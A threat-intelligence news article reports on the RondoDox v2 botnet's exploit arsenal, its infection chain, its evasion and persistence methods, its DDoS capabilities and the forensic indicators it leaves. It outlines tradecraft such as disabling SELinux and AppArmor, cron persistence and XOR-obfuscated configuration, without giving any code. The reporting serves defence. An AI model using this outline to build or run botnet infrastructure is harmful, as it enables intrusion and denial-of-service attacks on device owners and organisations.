RondoDox Botnet V2 Escalates: 75+ Exploits Target IoT and Enterprise Systems

A new iteration of the RondoDox botnet has been uncovered, exhibiting a dramatic escalation in both scale and technical sophistication. Whereas the original variant described in autumn 2024 exploited only a handful of vulnerabilities in surveillance cameras and routers, RondoDox v2 deploys more than seventy-five distinct exploits and has expanded its targets from IoT devices to enterprise applications — a shift that renders the malicious network markedly more dangerous and versatile.

Honeypot telemetry reveals automated attack attempts originating from an IP address in New Zealand; within a short span, more than seventy different payloads were observed, each crafted to exploit flaws in routers and other internet-exposed devices. Infections typically begin with the retrieval of a shell script from a remote server, followed by installation of a binary tailored to the target architecture.

The current wave is notable for its multi-stage chain: it selects the appropriate CPU architecture, forcibly unloads competing malware processes, and disables protection mechanisms such as SELinux and AppArmor. Resilience is achieved via a cron job that reinstates persistence at boot. Command-and-control is orchestrated through multiple servers hosted on compromised residential IPs, complicating efforts to trace and block the botnet’s control infrastructure.

RondoDox conceals its configuration with XOR obfuscation, hides activity behind seemingly benign HTTP requests whose User-Agent strings mimic mobile devices, and implements an extensive arsenal for DDoS operations: HTTP floods disguised as gaming traffic, UDP and SYN floods, and protocol emulation of popular services and games.

The dropper payload carries routines to remove competing malware, purge temporary directories, create a working directory, and fetch the appropriate executable. Dozens of architectures are supported — x86, ARM, MIPS, PowerPC and more — and each deployment includes a success check: if the binary exits with a specific code, the infection halts.

Analysts note that the campaign leaves multiple forensic markers: a publicly visible mailbox (bang2013[@]atomicmail[.]io) appears in the code, HTTP headers and on disk, facilitating correlation across network indicators, filesystem artifacts and process names. Detection signatures and rules for Snort, Suricata and YARA have already been published.

Compared with the first-generation botnet that emerged last year, RondoDox v2 has expanded its attack surface by roughly 650%. Having moved beyond consumer devices to actively target corporate infrastructure, its breadth and aggressiveness place it among the most menacing botnets of recent years — akin to Mirai and Gafgyt, but with far broader architectural support and modern evasion techniques.

Support Our Threat Intelligence

If you find our technology report and cybersecurity news helpful, consider supporting our work.

Buy Me a Coffee PayPal Crypto

USDT (TRC20):

TN8BdV8cp4T1Cd28gK9qTAnZknzzuwyUtm Copy

USDT (ERC20):

0x3725e1a7d3bc5765499fa6aaafe307fabcd75bce Copy